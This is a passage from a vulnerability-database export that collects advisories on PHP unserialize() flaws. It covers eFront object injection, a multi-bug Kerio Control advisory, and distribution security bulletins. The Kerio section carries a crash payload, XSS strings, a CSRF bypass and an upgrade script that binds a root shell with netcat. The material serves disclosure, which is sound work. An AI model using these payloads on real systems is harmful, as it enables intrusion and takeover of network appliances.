12410](https://vulners.com/osvdb/OSVDB:12410)\n[Related OSVDB ID: 12412](https://vulners.com/osvdb/OSVDB:12412)\n[Related OSVDB ID: 12413](https://vulners.com/osvdb/OSVDB:12413)\n[Related OSVDB ID: 12414](https://vulners.com/osvdb/OSVDB:12414)\nRedHat 
RHSA: RHSA-2005:031\nRedHat RHSA: RHSA-2005:816\nOther Advisory URL: http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000915\nOther Advisory URL: http://www.hardened-php.net/advisories/012004.txt\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2005_02_php4_mod_php4.html\nOther Advisory URL: http://www.ubuntulinux.org/support/documentation/usn/usn-66-1\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200412-14.xml\nOther Advisory URL: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:151\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0146.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-12/0332.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0173.html\nKeyword: SCOSA-2005.49\nKeyword: SSRT5998\nISS X-Force ID: 18514\n[CVE-2004-1019](https://vulners.com/cve/CVE-2004-1019)\n", "modified": "2004-12-15T08:12:00", "published": "2004-12-15T08:12:00", "href": "https://vulners.com/osvdb/OSVDB:12415", "id": "OSVDB:12415", "type": "osvdb", "title": "PHP unserialize() Function Negative Reference Arbitrary Code Execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:19", "bulletinFamily": "exploit", "description": "", "modified": "2015-05-09T00:00:00", "published": "2015-05-09T00:00:00", "href": "https://packetstormsecurity.com/files/131845/eFront-3.6.15-PHP-Object-Injection.html", "id": "PACKETSTORM:131845", "type": "packetstorm", "title": "eFront 3.6.15 PHP Object Injection", "sourceData": "`eFront 3.6.15 PHP Object Injection Vulnerability \n \n[+] Author: Filippo Roncari \n[+] Target: eFront \n[+] Version: 3.6.15 and probably lower \n[+] Vendor: www.efrontlearning.net \n[+] Accessibility: Remote \n[+] Severity: High \n[+] CVE: <requested> \n[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf 
\n[+] Info: f.roncari@securenetwork.it \n \n \n[+] Summary \neFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: \u201ceFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others\u201d. \n \n \n[+] Vulnerability Details \neFront 3.6.15 is prone to a PHP Object Injection vulnerability due to the unsafe use of unserialize() function. A potential attacker, authenticated as a Professor, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input. \n \n \n[+] Technical Details \nA PHP Object Injection issue affects the copy.php script, which handles the copying of content between lessons, and others probably exist, due to the frequent use of deserialization operations on non-sanitized user input. \n \n[!] File: libraries/includes/copy.php \n----------------------------- \nif ($_GET['transfered']) { \n$transferedNodesCheck = unserialize($_GET['transfered']); \n} \n$copiedTests = array(); \n$copiedUnits = array(); \n$map = array(); \nforeach ($nodeOrders as $value) { \nlist($id, $parentContentId) = explode(\"-\", $value); \nif (!in_array($id, $transferedNodesCheck)) { \n----------------------------- \n \nThe injection affects the \"transfered\" parameter. \n \n \n[+] Proof of Concept (PoC) \n \n \n[!] 
HTTP Request \n----------------------------- \nGET /test/efront/www/professor.php?ctg=copy&from=8&node_orders=&transfered=[SERIALIZED_ARBITRARY_OBJECT]&mode&a jax=ajax&csrf_id=6ebb0b3aee60a1764e780e8494985a8e HTTP/1.1 \nHost: localhost \nProxy-Connection: keep-alive \nAccept: text/javascript, text/html, application/xml, text/xml, */* \nX-Prototype-Version: 1.7 \nX-Requested-With: XMLHttpRequest \nCookie: display_all_courses=1; setFormRowsHidden=0; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; SQLiteManager_currentLangue=2; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; professor_sidebar=hidden; professor_sidebarMode=automatic; parent_sid=6ebb0b3aee60a1764e780e8494985a8e \n----------------------------- \n \nA common way to exploit this vulnerability is to find a PHP magic method that can be abused and inject a properly crafted arbitrary object in order to trigger it. Although a deeper analysis has not been performed, no useful PHP magic methods have been identified in order to exploit this specific vulnerability. Because the unmarshalled user input $transferedNodesCheck is exclusively used within an in_array() call, only __wakeup() and __destruct() methods could be abused to exploit the issue. However, none of those lends itself to the purpose. The vulnerability could still be abused in case of PHP vulnerable version (e.g., CVE-2014-8142) to create denial of service, leak memory and, under certain conditions, execute code. \n \n \n[+] Disclaimer \nPermission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. 
\n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131845/efront3615-inject.txt"}, {"lastseen": "2016-12-05T22:25:29", "bulletinFamily": "exploit", "description": "", "modified": "2016-09-22T00:00:00", "published": "2016-09-22T00:00:00", "href": "https://packetstormsecurity.com/files/138812/Kerio-Control-Unified-Threat-Management-Code-Execution-XSS-Memory-Corruption.html", "id": "PACKETSTORM:138812", "type": "packetstorm", "title": "Kerio Control Unified Threat Management Code Execution / XSS / Memory Corruption", "sourceData": "`SEC Consult has also released a blog post describing the attack scenarios \nof the vulnerabilities within this advisory in detail and a video which \nshows the remote attack. Exploit code has been developed as well but will \nnot be released for now. \n \nBlog: \nhttp://blog.sec-consult.com/2016/09/controlling-kerio-control-when-your.html \n \nVideo: \nhttps://www.youtube.com/watch?v=y_OWz25sHMI \n \n \nSEC Consult Vulnerability Lab Security Advisory < 20160922-0 > \n======================================================================= \ntitle: Potential backdoor access through multiple vulnerabilities \nproduct: Kerio Control Unified Threat Management \nvulnerable version: <9.1.3, verified in version 9.1.0 build 1087 and 9.1.1 \nbuild 1324 \nfixed version: 9.1.3 (partially fixed, see vendor statement below) \nCVE number: - \nimpact: critical \nhomepage: http://www.kerio.com/ \nfound: 2016-08-24 \nby: R. Freingruber (Office Vienna) \nR. 
Tavakoli (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nBangkok - Berlin - Linz - Montreal - Moscow \nSingapore - Vienna (HQ) - Vilnius - Zurich \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Protect your network from viruses, malware and malicious activity \nwith Kerio Control, the easy-to-administer yet powerful all-in-one \nsecurity solution. \nKerio Control brings together next-generation firewall capabilities - \nincluding a network firewall and router, intrusion detection and \nprevention (IPS), gateway anti-virus, VPN, and web contentand \napplication filtering. These comprehensive capabilities and unmatched \ndeployment flexibility make Kerio Control the ideal choice for small \nand mid-sized businesses.\" \n \nSource: http://www.kerio.com/products/kerio-control \n \n \nBusiness recommendation: \n------------------------ \nBy combining the vulnerabilities documented in this advisory an attacker \ncan fully compromise a network which uses the Kerio Control appliance for \nprotection. \n \nThe attacker can trick a victim to visit a malicious website which then conducts \nthe internal attack. The attacked victim must be logged in or weak credentials \nmust be configured which can be found with a bruteforce attack. \n \nThe attacker will gain a reverse root shell from the Internet to the internal \nKerio Control firewall system. Moreover, it's possible that an internal attacker \nuses the described vulnerabilities to escalate his privileges (low privileged \naccount to full root shell) to steal credentials from other users on the UTM \nappliance. \n \nMost vulnerabilities (RCE, CSRF bypasses, XSS, Heap Spraying) were found \nin just two PHP scripts. Both scripts are not referenced by any other \nPHP script nor by any binary on the system. \nBoth scripts contain a different(!), seemingly deliberate(?) 
CSRF bypass \nwhich make the vulnerabilities exploitable from the Internet to obtain a \nreverse root shell. \n \nSEC Consult recommends not to use Kerio Control until a thorough security \nreview has been performed by security professionals and all identified \nissues have been resolved. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Unsafe usage of the PHP unserialize function and outdated PHP version leads \nto remote-code-execution \nAn authenticated user (standard user or administrator) can control data, which \ngets later unserialized. Kerio Control uses PHP 5.2.13 which was released on \n2010-02-25. This version is more than 6 years old and several bugs were found \nin the meantime within the unserialize function. The following CVE numbers \nare just some examples for vulnerabilities in unserialize which lead to remote \ncode execution: \n-) CVE-2014-8142 \n-) CVE-2014-3515 \n-) CVE-2015-0231 \n-) CVE-2015-6834 \n-) CVE-2016-5771 \n-) CVE-2016-5773 \n \nPHP 5.2.13 is especially affected by CVE-2014-3515. This vulnerability uses a \ntype confusion attack to trigger a use-after-free vulnerability. It can be used \nto read data and get full code execution. In the case of Kerio Control the \nresult of unserialize is not reflected back to the attacker. It's therefore not \npossible to read memory from the stack or heap (e.g. to bypass ASLR). \n \nNevertheless, SEC Consult developed a fully working and reliable (blind) exploit \nfor this vulnerability which spawns a reverse root shell to the Kerio Control \nsystem. \nFor this exploit a user account is required. However, it's also possible to \nconduct the attack via the Internet because the CSRF (Cross Site Request \nForgery) check can be bypassed (see below). \n \nAn attacker can use this vulnerability to break into a company network via the \nInternet by tricking a logged in user to visit a malicious website. 
Even if the \nuser is currently not logged in the attacker can start a bruteforce attack to \nobtain valid credentials to conduct the attack. \n \n \n2) PHP script allows heap spraying \nOne of the PHP scripts allows the allocation of memory inside the main binary \n(winroute) of Kerio Control. Winroute contains the code of most services \n(e.g. the webserver, PHP, network related functionality, ...). \nThe memory will not be freed after finishing the request and can therefore be \nused to spray payloads to the whole memory space. \n \nThis vulnerability was used in the overall exploit to defeat ASLR. \nPlease bear in mind that it's very likely that an attacker can write a working \nexploit without heap spraying. Fixing this vulnerability would therefore not \nprevent the exploitation of the remote code execution vulnerability. \nFor example, the information disclosure vulnerability from this advisory can \nbe used to bypass ASLR as well. This would eliminate the need of heap spraying. \n \n \n3) CSRF Protection Bypass \nThe PHP scripts contain code to protect against CSRF (Cross Site Request \nForgery) attacks. Because of the wrong usage of PHP binary \noperations and comparisons it's possible to bypass this check. That means \nthat an attacker can trigger requests from other websites which will be handled \nby Kerio Control. This vulnerability allows to exploit the remote code \nexecution vulnerability from the Internet to break into a network. \n \n \n4) Webserver running with root privileges \nThe main binary (which contains the webserver and PHP) runs with root \nprivileges. \n \nKerio told SEC Consult that this vulnerability will not be fixed. SEC \nConsult strongly recommended otherwise. \n \n \n5) Reflected Cross Site Scripting (XSS) \nKerio Control does not properly encode parameters which are reflected on the \nwebsite. This leads to cross site scripting vulnerabilities. 
\nAn attacker can abuse these vulnerabilities to modify the website or do actions \nin the context of the attacked user. \n \n \n6) Missing memory corruption protections \nThe main binary (winroute) is not compiled as position-independent executable \n(PIE). This allowed the use of ROP (return-oriented-programming) code to \nbypass the not executable heap. Moreover, the stack is per default marked as \nexecutable, but the exact location of the stack is randomized by ASLR. \n \n \n7) Information Disclosure leads to ASLR bypass \nOne of the PHP scripts leaks pointers to the stack and heap. \nThis can be abused by attackers to bypass ASLR. \nBecause stacks are marked as executable an attacker can therefore easily bypass \nASLR and DEP/NX. \n \n \n8) Remote Code Execution as administrator \nNearly a year ago on 2015-10-12 Raschin Tavakoli reported a remote code \nexecution vulnerability in the administrative web interface in the upgrade \nfunctionality. This vulnerability is still unfixed, only the associated XSS \nvulnerability was fixed. However, an attacker can still exploit it from the \nInternet, e.g. by abusing the XSS vulnerability described in this advisory \n(where the CSRF check can be bypassed). \n \nWith this vulnerability an attacker can gain a reverse root shell on \nKerio Control again if a logged in administrator visits a malicious website \non the Internet. \nMore information can also be found in the old advisory: \nhttps://www.exploit-db.com/exploits/38450/ \n \n \n9) Login not protected against brute-force attacks \nThere are no bruteforce protections in place for the login. \nIf an unauthenticated victim visits an attacker's website, the attacker can \nstart a bruteforce attack to obtain valid credentials to execute the \nremote code execution exploit. Via image-loading the attacker can detect if \nthe current credentials are valid (without violating SOP). 
\n \n \nProof of concept: \n----------------- \n1) Unsafe usage of the PHP unserialize function and outdated PHP version leads \nto remote-code-execution \nThe following request can be used to set the unserialize data. In this example \na faked string is used which points to 0xffffffff (kernel memory). Unserializing \nit will therefore crash the remote webserver (the winroute process). \n \nPOST /set.php HTTP/1.1 \nHost: $IP:4081 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 730 \n \nk_securityHash=x&target=k_sessionVariable&k_variable=lastDisplayed&k_value=a:18:{s:8:\"k_dbName\";s:5:\"error\";s:11:\"k_dbSummara\";s:3:\"abc\";s:14:\"k_dbIndividual\";s:3:\"abc\";s:16:\"k_dbLastUsedType\";s:3:\"abc\";s:10:\"k_dbLayout\";s:3:\"abc\";s:10:\"k_pageType\";s:3:\"abc\";s:13:\"k_periodStart\";i:123;s:11:\"k_periodEnd\";i:123;s:8:\"k_userId\";i:123;s:6:\"tabBar\";i:123;s:13:\"k_gotoElement\";i:123;s:9:\"k_protoId\";i:123;s:11:\"k_errorType\";i:123;s:16:\"k_timezoneOffset\";i:123;s:9:\"k_groupId\";i:123;s:2:\"id\";i:123;s:11:\"k_dbSummary\";C:16:\"SplObjectStorage\":152:{x:i:2;O:8:\"stdClass\":1:{i:0;a:2:{i:1;i:1;i:2;i:2;}};d:2.0851592721051977e-262;;m:a:2:{i:0;S:15:\"\\ff\\ff\\ff\\ff\\20\\00\\00\\00\\01\\00\\00\\00\\06\\00\\00\";i:1;R:3;}}s:18:\"k_historyTimestamp\";s:3:\"abc\";} \n \nThe following request will call unserialize on the injected data: \n \nGET /contentLoader.php?k_getHistoryId=1&k_securityHash=x HTTP/1.1 \nHost: $IP:4081 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \n \nIn the example above only a denial of service will be conducted. However, an \nattacker can change the data type to object to get full code execution on \nthe remote system. \n \nSEC Consult developed a fully working exploit for this attack which spawns a \nroot shell. 
Please note that this exploit was intentionally written to just \ntarget Kerio Control 9.1.0 Build 1087. This is because hardcoded offsets \nare used which belong to the winroute binary with the SHA256 hash: \n2808c35528b9a4713b91f65a881dfca03088de08b6331fdee1c698523bd757b0 \nThis exploit will not be released for now. \n \nA real-world-attacker can detect the remote binary version by bruteforcing \nthe object handler related to CVE-2014-3515. \n \n \n2) PHP script allows heap spraying \nThe set.php script contains the following code: \n$p_variable = urldecode($_POST['k_variable']); \n$p_value = urldecode($_POST['k_value']); \n... \n$p_session->setSessionVariable($p_variable, $p_value); \n \nPOST requests with the following parameters can therefore be used to allocate \nspace on the remote system: \nk_securityHash=x&target=k_sessionVariable&k_variable=<random_name> \n&k_value=<payload_to_allocate> \n \nDuring tests it was possible to spray approximately 400 MB data in 30 seconds \nwhich is enough to control two predictable addresses on the heap. \n \n \n3) CSRF Protection Bypass \nTwo scripts are required for the remote code execution exploit: \n-) set.php \n-) ContentLoader.php \nBoth scripts contain different very interesting CSRF check bypasses. \n \nThe following code can be found in set.php: \n$p_session->getCsrfToken(&$p_securityHash); \n$p_postedHash = $_GET['k_securityHash'] || $_POST['k_securityHash']; \nif ('' == $p_postedHash || ($p_postedHash != $p_securityHash)) { \nexit(); \n} \n \nSince the programming language is PHP (and not JavaScript), the above code \ndoes not work as expected. $p_postedHash can only become 0 or 1 because || is a \nlogical operator. The if-condition compares the valid token with the posted one \nvia the != operator, however, this will not check if types are the same. \nIf k_securityHash is set (either via GET or POST) to any value, the above code \nwill compare the number 1 with a string, which will always bypass the check. 
\nIt's therefore enough to set k_securityHash to any value to bypass the CSRF \nprotection. \n \nThe following code can be found in contentLoader.php: \n$p_session->getCsrfToken(&$p_securityHash); \n$p_postedHash = $_GET['k_securityHash']; \n... \nif (!$p_session || ('' == $p_postedHash && $p_postedHash != $p_securityHash)) { \n$p_page = new p_Page(); \n$p_page->p_jsCode('window.top.location = \"index.php\";'); \n$p_page->p_showPageCode(); \ndie(); \n} \n \nNow the programmers only use the GET parameter, however, they changed the \nlogical operator in the if condition from || to && which means that the CSRF \ncheck will only be applied if $p_postedHash is empty. It's therefore again \nenough to set k_securityHash to any value to bypass the check. \n \n \n4) Webserver running with root privileges \nNo proof of concept necessary. \n \n \n5) Reflected Cross Site Scripting (XSS) \nIn the following request the k_historyTimestamp parameter is prone to XSS: \nhttps://<IP>:4081/contentLoader.php?k_dbName=x&k_securityHash=x \n&k_historyTimestamp=aa%22;alert(1)%3b// \n \nIn the same request the id parameter can be used to inject JavaScript code. \nNote that the attack can only be conducted against administrative users. \nUsers with standard privileges can only access pages with k_dbName set to one \nof the following values: \n-) accStats \n-) prefs \n-) dialup \n-) error \n \nIn such a case Kerio Control adds code like the following \n(in this example k_dbName=dialup): \nvar k_newDbName = \"<kerio:text id=\"tabCaption_dialup\"/>\"; \n \nThe \" characters within the string are not correctly encoded. \nThis will lead to the termination of the JavaScript execution. Because the \ninjected payload is stored after this code, the attacker must bypass this \ncode to ensure that the payload gets executed. This is only possible if \nthe attacked user is an administrator because administrators can load any \ndbName. By setting k_dbName to an invalid dbName (e.g. 
to 'x'), code like \nthe following will be added instead (which does not crash): \nvar k_newDbName = \"\"; \n \nAnother XSS can be found at: \nhttps://<IP>:4081/admin/internal/dologin.php?hash=%0D%0A\"><script>alert(1);</script><!-- \n \n \n6) Missing memory corruption protections \nNo proof of concept necessary. \n \n \n7) Information Disclosure leads to ASLR bypass \nThe following request returns information to the currently logged in user \n(e.g. session token and username): \n \nGET /nonauth/getLoginType.js.php HTTP/1.1 \nHost: $IP:4081 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \n \nThe following is a typical response: \n \nHTTP/1.1 200 OK \nConnection: Close \nContent-type: text/html \nDate: Tue, 24 Aug 2016 11:47:34 GMT \nServer: Kerio Control Embedded Web Server \nX-UA-Compatible: IE=edge \n \nk_loginParams.k_loginType = \"loginUnlock\";k_loginParams.k_nonauthToken = \n\"0xb59066a8\";k_loginParams.k_sessionToken = \n\"bc7c9ae78f01e498b7c935b4ad521b664d4e2c5574bde30cdf57851a58763660\";k_loginParams.k_loggedUser \n= {k_asocName: \"user\", k_fullName: \"user\"}; \n \nThe above response contains a valid pointer (0xb59066a8). In most cases this \npointer will point to the heap. However, sometimes this pointer will point \ninto a readable and writeable region behind a stack-region. \nThe target location always stores the same data. During the analysis no \nfurther effort was spent on analysing this behaviour. \n \nThe pointer will also be disclosed if the user is already logged out. 
\nIn such a case the response looks like: \n \nHTTP/1.1 200 OK \nConnection: Close \nContent-type: text/html \nDate: Tue, 24 Aug 2016 12:04:44 GMT \nServer: Kerio Control Embedded Web Server \nX-UA-Compatible: IE=edge \n \nk_loginParams.k_loginType = \"loginCommon\";k_loginParams.k_nonauthToken = \n\"0xb2ee208\"; \n \n \nAn attack scenario can be: \n-) The attacker tricks a victim to visit the attacker's malicious website \n-) The attacker's website uses the CSRF bypass and the identified XSS \nvulnerability to embed a malicious script inside the Kerio Control website \n-) The attacker's website iframes the Kerio Control website to trigger the \nexecution of the XSS payload \n-) The XSS payload runs on the same domain and can therefore send requests \nand read responses. This means the attacker can send requests to \ngetLoginType.js.php to obtain a memory pointer. \n-) If the memory pointer is within a specific range (e.g. the highest nibble \nis zero), it's a pointer to the heap. In such a case the RCE vulnerability \ncan be used to crash and restart the server. After that the same check can \nbe done again. \n-) If the memory pointer points near a stack (highest nibble is 0xb), the \npointer can be used to calculate the base address of a stack. \n-) Now the attacker knows the location of a stack (all stacks are marked as \nreadable, writeable and executable). He can now easily bypass ASLR and DEP. \n \n \n8) Remote Code Execution as administrator \nAn attacker can create a malicious upgrade image with the following \ncommands: \ncat upgrade.sh \n#!/bin/bash \nnc -lp 9999 -e /bin/bash & \n \ntar czf upgrade.tar.gz * \nmv upgrade.tar.gz upgrade.img \n \nThe image can be uploaded in the administrative web interface. \nThis will bind a root shell on port 9999. The complete attack can also be \nconducted via the cross site scripting vulnerability described in this \nadvisory (XSS in contentLoader.php). 
This enables an attacker to conduct \nthe attack from the Internet to obtain a reverse shell on Kerio Control. \n \n \n9) Login not protected against brute-force attacks \nValid credentials can be obtained via a brute-force attack. \nIt's enough to send a POST request to /internal/dologin.php with the \nparameters kerio_username and kerio_password set. A remote attacker \ncan detect if the credentials are correct without reading the \nresponse (SOP would not allow to read the response). This is possible \nbecause /internal/photo will only return a valid image if the user is \ncurrently logged in. The attacker can load an image from this URL and \ncheck if loading was successful to leak the information if the \ncredentials are valid or not. \nThe following code demonstrates this: \n<img src=\"https://<Kerio-IP>/internal/photo\" onerror=not_logged_in(); \nonload=logged_in();></img> \n \n \nVulnerable / tested versions: \n----------------------------- \nThe following product versions were found to be vulnerable which were the \nlatest versions available at the time of the discovery: \nv9.1.0 (Build 1087) \nv9.1.1 (Build 1324) \n \n \nVendor contact timeline: \n------------------------ \n2016-08-29: Contacting vendor through website \n(bug report: bugreports@support.kerio.com) Ticket-ID: MYW-768664 \n2016-08-31: No answer, contacting CTO of Kerio via email \n2016-09-01: Received security contact with PGP & S/MIME certificate \n2016-09-01: Transmission of PGP encrypted advisory to Kerio \n2016-09-09: Received answer, Kerio confirms vulnerabilities 1,2,3,5,6,7 \nStatement to vulnerability 9: \n\"the feature already is in the product.\" \nStatement to vulnerabilities 4 (Webserver running with root \nprivileges) and 8 (Remote Code Execution as administrator): \n\"I do not consider this a vulnerability\" \nUpdate including a fix will be available on 2016-09-20 \n2016-09-09: SEC Consult informed Kerio to re-think the decision \nnot fixing the vulnerabilities 4, 8 and 9 \nSEC 
Consult highly recommends to fix all reported issues \n2016-09-13: SEC Consult informed Kerio that the advisory will be \nreleased on 2016-09-22 \n2016-09-20: Kerio releases patch for Kerio Control \n2016-09-22: Coordinated release of security advisory \n \n \nSolution: \n--------- \nThe vendor has released version 9.1.3 on 20th September which, according \nto the vendor, fixes the vulnerabilities 1,2,3,5,6,7. \n \nThe vendor told us the following regarding vulnerability 9: \n\"the feature already is in the product\" \n \nVulnerability 4 and 8 are not considered a vulnerability by the vendor \nand will not be fixed. \nSEC Consult strongly recommended fixing issue 4 and 8 as well. \n \nThe latest version can be downloaded from here: \nhttp://www.kerio.com/support/kerio-control \nhttp://www.kerio.com/support/kerio-control/release-history \n \n \nWorkaround: \n----------- \nNone \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nBangkok - Berlin - Linz - Montreal - Moscow \nSingapore - Vienna (HQ) - Vilnius - Zurich \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? 
\nSend us your application https://www.sec-consult.com/en/Career.htm \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/About/Contact.htm \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF R. Freingruber / @2016 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/138812/SA-20160922-0.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:40", "bulletinFamily": "unix", "description": "A use-after-free flaw was found in PHP unserialize(). An untrusted input\ncould cause PHP interpreter to crash or, possibly, execute arbitrary\ncode when processed using unserialize().", "modified": "2014-12-19T00:00:00", "published": "2014-12-19T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-December/000183.html", "id": "ASA-201412-23", "title": "php: use after free", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:46", "bulletinFamily": "unix", "description": "- CVE-2014-9427 (information leak, remote code execution)\n\nA one-byte file containing only the '#' character, not followed by any\nnewline, causes php-cgi to do an out of bound read, potentially\ndisclosing sensitive information present in memory or even triggering\ncode execution if adjacent memory location contains valid PHP code.\n\n- CVE-2015-0231 (remote code execution)\n\nA use-after-free vulnerability in unserialize() allows a remote attacker\nto execute arbitrary code. 
This vulnerability results from an incomplete\nfix for CVE-2014-8142.\n\n- CVE-2015-0232 (remote code execution)\n\nAn attempt to free an uninitialized pointer may result in arbitrary code\nexecution while parsing exif information from a carefully crafted file.", "modified": "2015-01-23T00:00:00", "published": "2015-01-23T00:00:00", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-January/000215.html", "id": "ASA-201501-17", "title": "php: remote code execution", "type": "archlinux", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-18T13:49:12", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3117-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nDecember 31, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nCVE ID : CVE-2014-8142\n\nSeveral vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream version\n5.4.36, which includes additional bug fixes, new features and possibly\nincompatible changes. Please refer to the upstream changelog for more\ninformation:\n\n http://php.net/ChangeLog-5.php#5.4.36\n\nTwo additional patches were applied on top of the imported new upstream\nversion. An out-of-bounds read flaw was fixed which could lead php5-cgi\nto crash. 
Moreover a bug with php5-pgsql in combination with PostgreSQL\n9.1 was fixed (Debian Bug #773182).\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 5.4.36-0+deb7u1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-12-31T14:47:23", "published": "2014-12-31T14:47:23", "id": "DEBIAN:DSA-3117-1:8494A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00308.html", "title": "[SECURITY] [DSA 3117-1] php5 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:27", "bulletinFamily": "unix", "description": "Stefan Esser reported several buffer overflows in PHP\u2019s variable unserializing handling. These could allow an attacker to execute arbitrary code on the server with the PHP interpreter\u2019s privileges by sending specially crafted input strings (form data, cookie values, and similar).\n\nAdditionally, Ilia Alshanetsky discovered a buffer overflow in the exif_read_data() function. Attackers could execute arbitrary code on the server by sending a JPEG image with a very long \u201csectionname\u201d value to PHP applications that support image uploads.", "modified": "2004-12-17T00:00:00", "published": "2004-12-17T00:00:00", "id": "USN-40-1", "href": "https://usn.ubuntu.com/40-1/", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:30", "bulletinFamily": "unix", "description": "Stefan Esser discovered that PHP incorrectly handled unserializing objects. 
A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2014-8142, CVE-2015-0231)\n\nBrian Carpenter discovered that the PHP CGI component incorrectly handled invalid files. A local attacker could use this issue to obtain sensitive information, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2014-9427)\n\nIt was discovered that PHP incorrectly handled certain pascal strings in the fileinfo extension. A remote attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2014-9652)\n\nAlex Eubanks discovered that PHP incorrectly handled EXIF data in JPEG images. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-0232)\n\nIt was discovered that the PHP opcache component incorrectly handled memory. A remote attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2015-1351)\n\nIt was discovered that the PHP PostgreSQL database extension incorrectly handled certain pointers. A remote attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. 
